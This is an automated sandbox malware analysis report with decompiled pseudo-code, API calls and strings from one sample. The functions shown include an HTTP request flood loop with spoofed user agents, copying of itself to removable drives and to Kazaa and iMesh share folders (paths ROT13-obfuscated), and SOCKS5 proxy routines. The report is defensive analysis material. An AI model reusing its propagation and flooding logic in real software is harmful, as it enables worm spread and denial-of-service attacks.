					_v56 = _t64;
					_t65 =  *0x10005268; // 0x3357474e
					_v52 = _t65;
					_v48 =  *0x1000526c & 0x0000ffff;
					 *_t134 = _t127;
					_t68 = FindAtomA(??) & 0x0000ffff;
					_t135 = _t134 - 4;
					_v196 = _t68;
					if(_t68 != 0) {
						L11:
						_t108 = E10003150(_t68, _t107);
					} else {
						 *_t135 = 0x3c;
						_t72 = malloc(??);
						_t108 = _t72;
						if(_t72 == 0) {
							abort();
							0;
							0;
							_t137 = _t135 - 0x18;
							_v232 = _v204;
							_v236 = _v208;
							_v240 = _v212;
							_v244 = _v216;
							 *_t137 =  *0x10008258 + 0x40;
							fprintf(??, ??);
							 *_t137 =  *0x10008258 + 0x40;
							fflush(_t131);
							abort();
							0;
							goto ( *0x10008244);
						}
						asm("cld");
						memset(_t72, _v196, 0xf << 2);
						_t138 = _t135 + 0xc;
						 *((intOrPtr*)(_t108 + 4)) = L100034E8;
						_t114 = 1;
						 *((intOrPtr*)(_t108 + 8)) = E10003140;
						 *_t108 = 0x3c;
						 *((intOrPtr*)(_t108 + 0x28)) = 0;
						 *((intOrPtr*)(_t108 + 0x14)) =  *0x10006034;
						 *((intOrPtr*)(_t108 + 0x18)) =  *0x10006038;
						 *((intOrPtr*)(_t108 + 0x1c)) =  *0x10004064;
						 *((intOrPtr*)(_t108 + 0x20)) =  *0x10004068;
						 *((intOrPtr*)(_t108 + 0x30)) = 0xffffffff;
						 *((intOrPtr*)(_t108 + 0x2c)) =  *0x10006044;
						 *((intOrPtr*)(_t108 + 0x38)) =  *0x10004070;
						_t118 = 0x1f;
						 *((intOrPtr*)(_t108 + 0x34)) =  *0x1000406c;
						do {
							_t90 = _t108 & _t114;
							asm("sbb eax, eax");
							_t114 = _t114 + _t114;
							 *((char*)(_t118 +  &_v192)) = (_t90 & 0x00000020) + 0x41;
							_t118 = _t118 - 1;
						} while (_t118 >= 0);
						_t93 = "-LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32"; // 0x42494c2d
						_v160 = _t93;
						_t94 = M10005250; // 0x57434347
						_v156 = _t94;
						_t95 = M10005254; // 0x452d3233
						_v152 = _t95;
						_t96 = M10005258; // 0x2d322d48
						_v148 = _t96;
						_t97 = M1000525C; // 0x4a4c4a53
						_v144 = _t97;
						_t98 = M10005260; // 0x4854472d
						_v140 = _t98;
						_t99 = M10005264; // 0x494d2d52
						_v136 = _t99;
						_t100 =  *0x10005268; // 0x3357474e
						_v132 = _t100;
						_v128 =  *0x1000526c & 0x0000ffff;
						 *_t138 =  &_v192;
						_t124 = AddAtomA(??) & 0x0000ffff;
						_t139 = _t138 - 4;
						if(_t124 != 0) {
							_t105 = E10003150(_t124, _t108);
							_t119 = _t124;
							if(_t105 != _t108) {
								goto L8;
							} else {
								goto L9;
							}
							goto L18;
						} else {
							L8:
							_t119 = 0;
						}
						L9:
						if(_t119 == 0) {
							 *_t139 = _t108;
							L10003498();
							 *_t139 = _t127;
							_t68 = FindAtomA(??) & 0x0000ffff;
							goto L11;
						}
					}
					 *0x10006114 = _t108;
					_t46 = _t108 + 4; // 0x4
					 *0x10006104 = _t46;
					_t47 = _t108 + 8; // 0x8
					_t71 = _t47;
					 *0x10006124 = _t71;
					return _t71;
				} else {
					return __eax;
				}
				L18:
			}

0x10001173
0x100031f1
0x100031f5
0x100031f6
0x10003204
0x1000320e
0x10003215
0x1000321a
0x1000321d
0x10003224
0x1000322b
0x1000322e
0x10003233
0x1000323a
0x10003241
0x10003244
0x10003249
0x10003250
0x10003257
0x1000325a
0x1000325f
0x10003266
0x10003269
0x1000326e
0x10003271
0x10003276
0x10003279
0x1000327e
0x10003281
0x10003286
0x10003290
0x10003294
0x1000329d
0x100032a0
0x100032a5
0x100032ab
0x100033ec
0x100033f1
0x100032b1
0x100032b1
0x100032b8
0x100032bf
0x100032c1
0x10003420
0x1000342b
0x1000342f
0x10003433
0x10003439
0x10003440
0x10003447
0x1000344e
0x1000345a
0x1000345d
0x1000346a
0x1000346d
0x10003472
0x1000347d
0x10003480
0x10003480
0x100032c7
0x100032d5
0x100032d5
0x100032d7
0x100032de
0x100032e3
0x100032ef
0x100032fb
0x10003302
0x1000330a
0x10003313
0x1000331b
0x1000331e
0x10003325
0x10003333
0x10003336
0x1000333b
0x10003340
0x10003342
0x10003347
0x1000334b
0x1000334f
0x10003356
0x10003356
0x10003359
0x1000335e
0x10003364
0x10003369
0x1000336f
0x10003374
0x1000337a
0x1000337f
0x10003385
0x1000338a
0x10003390
0x10003395
0x1000339b
0x100033a0
0x100033a3
0x100033a8
0x100033b2
0x100033bc
0x100033c5
0x100033c8
0x100033cd
0x10003413
0x1000341a
0x1000341c
0x00000000
0x1000341e
0x00000000
0x1000341e
0x00000000
0x100033cf
0x100033cf
0x100033cf
0x100033cf
0x100033d1
0x100033d3
0x100033d5
0x100033d8
0x100033dd
0x100033e9
0x00000000
0x100033e9
0x100033d3
0x100033f3
0x100033f9
0x100033fc
0x10003401
0x10003401
0x10003404
0x10003410
0x10003206
0x1000320d
0x1000320d
0x00000000

APIs

FindAtomA.KERNEL32 ref: 10003297
malloc.MSVCRT ref: 100032B8
AddAtomA.KERNEL32 ref: 100033BF

Strings

AAAA, xrefs: 1000325F
-LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32, xrefs: 10003215, 10003359
AAAA, xrefs: 10003224
AAAA, xrefs: 1000321D
AAAA, xrefs: 1000323A
AAAA, xrefs: 10003250
AAAA, xrefs: 1000320E
AAAA, xrefs: 10003233
AAAA, xrefs: 10003249

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: Atom$Findmalloc
String ID: -LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32$AAAA$AAAA$AAAA$AAAA$AAAA$AAAA$AAAA$AAAA
API String ID: 822928543-4229226183
Opcode ID: 1cde5f556251f28f7a5f3583a1219a429abfe4cc9823d3c67868c7c8279f6633
Instruction ID: 71f7b58b7c901956c89d88a69398e3d4065bf1f5cfcf73eda586495b1d2063c5
Opcode Fuzzy Hash: 1cde5f556251f28f7a5f3583a1219a429abfe4cc9823d3c67868c7c8279f6633
Instruction Fuzzy Hash: B36137B4A00324CFEB51CF68C9C469ABBF4FB49391F15816AE948EB319E731A944CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00406A48 Relevance: 24.6, APIs: 4, Strings: 10, Instructions: 82
sleepnetworkCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00406A48(void* __eflags, intOrPtr* _a4) {
				void* _v16;
				char _v1052;
				intOrPtr _v1068;
				intOrPtr _v1072;
				intOrPtr _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				char* _v1100;
				char* _v1104;
				char* _v1108;
				char* _v1112;
				char* _v1116;
				char* _v1120;
				char* _v1124;
				char* _v1128;
				char* _v1132;
				intOrPtr _v1144;
				intOrPtr _v1148;
				intOrPtr _v1152;
				char _v1156;
				char* _v1160;
				void* __ebx;
				signed int _t39;
				char _t45;
				intOrPtr* _t49;
				char _t50;
				intOrPtr _t51;
				char _t63;
				char _t64;
				void* _t65;
				void* _t66;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t70;

				_t67 = _t66 - 0x47c;
				_t49 = _a4;
				_v1132 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)";
				_v1128 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon)";
				_v1124 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729)";
				_v1120 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)";
				_v1116 = "Opera/9.64 (Windows NT 5.1; U; ru) Presto/2.1.1";
				_v1112 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)";
				_v1108 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)";
				_v1104 = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)";
				_v1100 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)";
				 *_t67 = 9;
				_t39 = E00404EAE();
				_t51 =  *_t49;
				_v1084 = _t51;
				_t63 =  *((intOrPtr*)(_t49 + 4));
				_v1080 = _t63;
				_v1076 =  *((intOrPtr*)(_t49 + 8));
				_v1072 =  *((intOrPtr*)(_t49 + 0xc));
				_v1068 =  *((intOrPtr*)(_t49 + 0x10));
				_v1148 = _t51;
				_v1152 =  *((intOrPtr*)(_t65 + _t39 * 4 - 0x468));
				_v1156 = _t63;
				_v1160 = "GET %s HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\n";
				_t50 =  &_v1052;
				 *_t67 = _t50;
				wsprintfA(??, ??);
				asm("cld");
				asm("repne scasb");
				 *((short*)(0xffffffff + _t50)) = 0xa0d;
				 *((char*)(0xbadbac + _t50 + 2)) = 0;
				_t64 = _t50;
				while(1) {
					_t45 = E00405434(_v1084, _t50, _v1084, _v1076);
					_t50 = _t45;
					if(_t45 == 0xffffffff) {
						break;
					}
					asm("cld");
					asm("repne scasb");
					_v1144 = 0;
					_v1148 = 0xbadbac;
					_v1152 = _t64;
					_v1156 = _t50;
					L004086B0();
					_t69 = _t67 - 0x10;
					 *_t69 = _t50;
					L004086C0();
					_t70 = _t69 - 4;
					 *_t70 = _v1068;
					Sleep(??);
					_t67 = _t70 - 4;
				}
				return 0;
			}

0x00406a4e
0x00406a54
0x00406a57
0x00406a61
0x00406a6b
0x00406a75
0x00406a7f
0x00406a89
0x00406a93
0x00406a9d
0x00406aa7
0x00406ab1
0x00406ab8
0x00406abd
0x00406abf
0x00406ac5
0x00406ac8
0x00406ad1
0x00406ada
0x00406ae3
0x00406ae9
0x00406af4
0x00406af8
0x00406afc
0x00406b04
0x00406b0a
0x00406b0d
0x00406b14
0x00406b1c
0x00406b21
0x00406b27
0x00406b2c
0x00406b2e
0x00406b41
0x00406b46
0x00406b4b
0x00000000
0x00000000
0x00406b4f
0x00406b57
0x00406b5c
0x00406b64
0x00406b68
0x00406b6c
0x00406b6f
0x00406b74
0x00406b77
0x00406b7a
0x00406b7f
0x00406b88
0x00406b8b
0x00406b90
0x00406b90
0x00406ba1

APIs

Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5

wsprintfA.USER32 ref: 00406B0D

Part of subcall function 00405434: WSASocketA.WS2_32 ref: 0040546A
Part of subcall function 00405434: htons.WS2_32 ref: 00405485
Part of subcall function 00405434: WSAConnect.WS2_32 ref: 004054D7

send.WS2_32 ref: 00406B6F
closesocket.WS2_32 ref: 00406B7A
Sleep.KERNEL32 ref: 00406B8B

Strings

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322), xrefs: 00406A75
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;), xrefs: 00406A93
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0), xrefs: 00406AA7
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1), xrefs: 00406A57
Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0), xrefs: 00406A9D
Opera/9.64 (Windows NT 5.1; U; ru) Presto/2.1.1, xrefs: 00406A7F
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon), xrefs: 00406A61
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1), xrefs: 00406A89
GET %s HTTP/1.1Connection: Keep-AliveUser-Agent: %sHost: %sAccept: */*, xrefs: 00406AFC
Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729), xrefs: 00406A6B

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: ConnectCountSleepSocketTickclosesockethtonsrandsendsrandwsprintf
String ID: GET %s HTTP/1.1Connection: Keep-AliveUser-Agent: %sHost: %sAccept: */*$Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon)$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)$Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)$Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)$Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)$Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729)$Opera/9.64 (Windows NT 5.1; U; ru) Presto/2.1.1
API String ID: 336679807-801071570
Opcode ID: c83cad52eaf153bfa2597a7668835f7560a72396ad6db5fc3469acb45590c5f7
Instruction ID: 5cdc0710ae53c098c5dd65590a42bc470b49e3f5e350015ac0ed1cf0fb49e237
Opcode Fuzzy Hash: c83cad52eaf153bfa2597a7668835f7560a72396ad6db5fc3469acb45590c5f7
Instruction Fuzzy Hash: D83141F49047148BCB20DF29C58428DBBF0EF85314F1085AEE558AB392D7789A95CF5E

Uniqueness

Uniqueness Score: -1.00%

Function 100017DF Relevance: 24.2, APIs: 16, Instructions: 163
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100017DF(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, char* _a8, void* _a12, intOrPtr _a16, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				void* _v44;
				void* _v45;
				void* _v68;
				void* _v72;
				void* _v76;
				void* _t61;
				void* _t62;
				char* _t97;
				void* _t99;
				intOrPtr _t103;
				intOrPtr _t106;

				_v16 = __ebx;
				_v12 = __esi;
				_v8 = __edi;
				_t106 = _a4;
				_t97 = _a8;
				_t103 = _a16;
				_t62 = E1000128D(_t61, _t106, _t97, 4);
				_t99 = 0;
				if(_t62 == 0 ||  *_t97 == 5 &&  *((char*)(_t97 + 2)) == 0) {
					L31:
					return _t99;
				} else {
					goto L31;
				}
			}

0x100017e5
0x100017e8
0x100017eb
0x100017ee
0x100017f1
0x100017f4
0x10001806
0x1000180b
0x10001812
0x10001a4c
0x10001a5a
0x00000000
0x00000000
0x00000000

APIs

sread.SHERVANS ref: 10001806
socks5_exec.SHERVANS ref: 10001863

Part of subcall function 1000157E: GetTempPathA.KERNEL32 ref: 1000159B
Part of subcall function 1000157E: GetTempFileNameA.KERNEL32 ref: 100015C0
Part of subcall function 1000157E: CreateFileA.KERNEL32 ref: 100015FB
Part of subcall function 1000157E: closesocket.WS2_32 ref: 100017BA
Part of subcall function 1000157E: DeleteFileA.KERNEL32 ref: 100017CF

sread.SHERVANS ref: 100019B7
sread.SHERVANS ref: 100019D2
swrite.SHERVANS ref: 100019ED
swrite.SHERVANS ref: 10001A05
swrite.SHERVANS ref: 10001A20
sread.SHERVANS ref: 10001A45

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: sread$Fileswrite$Temp$CreateDeleteNamePathclosesocketsocks5_exec
String ID:
API String ID: 1579704005-0
Opcode ID: 1361eb1be249255d460c70edfd148e1c9b89b3f8427c69b145975216a9914cb7
Instruction ID: 5eecf2eb680c679f1e884437c8fbeb8378991082b1e0f8ebcdaa05e3154df527
Opcode Fuzzy Hash: 1361eb1be249255d460c70edfd148e1c9b89b3f8427c69b145975216a9914cb7
Instruction Fuzzy Hash: EC6119B4A0A7459BF741DF64C08039EBBE0EF89290F11881DE888D7359DB74DA85CB97

Uniqueness

Uniqueness Score: -1.00%

Function 004068A0 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 81
stringsleepfileCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E004068A0() {
				void* _v16;
				char _v188;
				char _v220;
				char _v348;
				char _v349;
				char _v380;
				void _v476;
				intOrPtr _v484;
				int _v488;
				void* _v492;
				int _t40;
				CHAR* _t42;
				void* _t47;
				signed int _t49;
				void* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				void* _t54;
				void** _t55;
				intOrPtr* _t56;

				memcpy( &_v476, 0x40d460, 0x60);
				E00404C38( &_v380, "nhgbeha.vas");
				_v488 = "fngbeanf.qyy";
				_t47 =  &_v220;
				_v492 = _t47;
				E00404C38();
				_v484 = _t47;
				_v488 = 0x96;
				_v492 =  &_v188;
				E00404620();
				if(E00404ED6( &_v188) != 0) {
					_t50 =  &_v348;
					while(1) {
						Sleep(0x1770);
						_t54 = _t53 - 4;
						_t49 = 0;
						do {
							_t40 = GetDriveTypeA( *(_t52 + _t49 * 4 - 0x1d8));
							_t54 = _t54 - 4;
							if(_t40 == 2) {
								_t51 =  &_v348;
								memset(_t51, 0, 0x78);
								_t42 =  *(_t52 + _t49 * 4 - 0x1d8);
								_v488 = _t42;
								_v492 = _t51;
								L0040C208();
								_v492 = _t51;
								L0040C310();
								_t55 = _t54 - 4;
								if(_t42[(char*)( &_v349)] != 0x5c) {
									_v492 = 0x412935;
									 *_t55 = _t51;
									L0040C328();
									_t55 = _t55 - 8;
								}
								_v492 =  &_v380;
								 *_t55 = _t50;
								L0040C208();
								 *_t55 = 1;
								SetErrorMode(??);
								_t56 = _t55 - 4;
								_v488 = 0;
								_v492 = _t50;
								 *_t56 =  &_v188;
								CopyFileA(??, ??, ??);
								_t54 = _t56 - 0xc;
							}
							_t49 = 1 + _t49;
						} while (_t49 <= 0x17);
					}
				}
				return 0;
			}

0x004068c5
0x004068db
0x004068e0
0x004068e8
0x004068ee
0x004068f1
0x004068f6
0x004068fa
0x00406908
0x0040690b
0x0040691a
0x00406920
0x00406926
0x0040692d
0x00406932
0x00406935
0x0040693a
0x00406944
0x00406949
0x0040694f
0x00406955
0x0040696e
0x00406973
0x0040697a
0x0040697e
0x00406981
0x00406986
0x00406989
0x0040698e
0x00406999
0x0040699b
0x004069a3
0x004069a6
0x004069ab
0x004069ab
0x004069b4
0x004069b8
0x004069bb
0x004069c0
0x004069c7
0x004069cc
0x004069cf
0x004069d7
0x004069e1
0x004069e4
0x004069e9
0x004069e9
0x004069ec
0x004069ed
0x004069f6
0x00406926
0x00406a07

APIs

memcpy.MSVCRT ref: 004068C5

Part of subcall function 00404620: memset.MSVCRT ref: 0040463D
Part of subcall function 00404620: GetSystemDirectoryA.KERNEL32 ref: 00404649
Part of subcall function 00404620: lstrlen.KERNEL32 ref: 00404654
Part of subcall function 00404620: lstrcat.KERNEL32 ref: 0040466E
Part of subcall function 00404620: lstrcat.KERNEL32 ref: 00404680

Part of subcall function 00404ED6: fopen.MSVCRT ref: 00404EEA
Part of subcall function 00404ED6: fclose.MSVCRT ref: 00404EFB

Sleep.KERNEL32 ref: 0040692D
GetDriveTypeA.KERNEL32 ref: 00406944
memset.MSVCRT ref: 0040696E
_mbscat.MSVCRT ref: 00406981
lstrlen.KERNEL32 ref: 00406989
lstrcat.KERNEL32 ref: 004069A6
_mbscat.MSVCRT ref: 004069BB
SetErrorMode.KERNEL32 ref: 004069C7
CopyFileA.KERNEL32 ref: 004069E4

Strings

x, xrefs: 0040695B
fngbeanf.qyy, xrefs: 004068E0
nhgbeha.vas, xrefs: 004068CA

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: lstrcat$_mbscatlstrlenmemset$CopyDirectoryDriveErrorFileModeSleepSystemTypefclosefopenmemcpy
String ID: fngbeanf.qyy$nhgbeha.vas$x
API String ID: 1674407683-3747760128
Opcode ID: a781d3461717b306554f03ee67c14ce0aa3dc3647b02a65b4a03f677e82d5d21
Instruction ID: ef6cf4129608155cc112f4a97fe144a2978ba8a5c429c4c3aaf2c51783ef7b88
Opcode Fuzzy Hash: a781d3461717b306554f03ee67c14ce0aa3dc3647b02a65b4a03f677e82d5d21
Instruction Fuzzy Hash: 01313BB0808704DAD710BF65D58539EBBF4AF84318F41897EE8C867282D77C9598CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 00403390 Relevance: 21.2, APIs: 14, Instructions: 153fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 004033D2
GetFileSize.KERNEL32 ref: 00403409
CreateFileMappingA.KERNEL32 ref: 00403448
CloseHandle.KERNEL32 ref: 0040346E
MapViewOfFile.KERNEL32 ref: 004034A9
CloseHandle.KERNEL32 ref: 004034C0
CloseHandle.KERNEL32 ref: 004034D1

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: File$CloseHandle$Create$MappingSizeView
String ID:
API String ID: 3733816638-0
Opcode ID: 28ad9512942125c148e9156a3630da42204dd69e6c08cca65b9db14b0c4ba9a3
Instruction ID: 986d351c7ed07d29ba8de43e54e9a7d5c311c5fefbca7bada34d70547d36c5f0
Opcode Fuzzy Hash: 28ad9512942125c148e9156a3630da42204dd69e6c08cca65b9db14b0c4ba9a3
Instruction Fuzzy Hash: 0F513FB59043059BDB10AF25C99535EBFF4AF81348F1089AEE488673C1D779DA88CB87

Uniqueness

Uniqueness Score: -1.00%

Function 00405850 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 111stringregistryfileCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 004058F5
RegQueryValueExA.ADVAPI32 ref: 0040593C
RegCloseKey.ADVAPI32 ref: 00405955
lstrlen.KERNEL32 ref: 0040596D
lstrlen.KERNEL32 ref: 00405982
lstrlen.KERNEL32 ref: 0040599B
lstrcat.KERNEL32 ref: 004059B8
lstrcpy.KERNEL32 ref: 004059EC
lstrcat.KERNEL32 ref: 00405A02
CopyFileA.KERNEL32 ref: 00405A19

Strings

Fbsgjner\Xnmnn\Genafsre, xrefs: 0040586F
QyQve0, xrefs: 00405885

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: lstrlen$lstrcat$CloseCopyFileOpenQueryValuelstrcpy
String ID: Fbsgjner\Xnmnn\Genafsre$QyQve0
API String ID: 3255004976-3635034446
Opcode ID: 96bb27e789c0454cfa1d7dd6218e760f1b91c58a1b94f5de8dcecc10dbf1df5e
Instruction ID: afcb269cad9b4d3002b0b3817e33f6dff803cc776bda76573fbb9b1efc1f5d05
Opcode Fuzzy Hash: 96bb27e789c0454cfa1d7dd6218e760f1b91c58a1b94f5de8dcecc10dbf1df5e
Instruction Fuzzy Hash: 0751FBB4D05718DBDB50EF24C58939EBBF0AF44304F4189BED88867381D7789A888F96

Uniqueness

Uniqueness Score: -1.00%

Function 00405A3E Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 111stringregistryfileCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00405AE3
RegQueryValueExA.ADVAPI32 ref: 00405B2A
RegCloseKey.ADVAPI32 ref: 00405B43
lstrlen.KERNEL32 ref: 00405B5B
lstrlen.KERNEL32 ref: 00405B70
lstrlen.KERNEL32 ref: 00405B89
lstrcat.KERNEL32 ref: 00405BA6
lstrcpy.KERNEL32 ref: 00405BDA
lstrcat.KERNEL32 ref: 00405BF0
CopyFileA.KERNEL32 ref: 00405C07

Strings

Fbsgjner\vZrfu\Trareny, xrefs: 00405A5D
QbjaybnqQve, xrefs: 00405A73

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: lstrlen$lstrcat$CloseCopyFileOpenQueryValuelstrcpy
String ID: Fbsgjner\vZrfu\Trareny$QbjaybnqQve
API String ID: 3255004976-427315093
Opcode ID: 94e05c4d2cf339448625aa2dd311526b15f0b73e23a95898dc47c488b5c81944
Instruction ID: 4c2f52c761e00ed0f591be26c1bd4671a41acc1e7387a317ba9ae8b83013203e
Opcode Fuzzy Hash: 94e05c4d2cf339448625aa2dd311526b15f0b73e23a95898dc47c488b5c81944
Instruction Fuzzy Hash: D051FCB4905718CEDB60EF24C58939EBBF4AF44304F4185BEDC8867381D7789A888F96

Uniqueness

Uniqueness Score: -1.00%

Function 004017F8 Relevance: 19.6, APIs: 13, Instructions: 108
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E004017F8(signed int __edx, CHAR* _a4, intOrPtr* _a8) {
				void* _v16;
				DWORD* _v20;
				signed int _v24;
				signed int _v28;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				signed int _v52;
				DWORD* _v56;
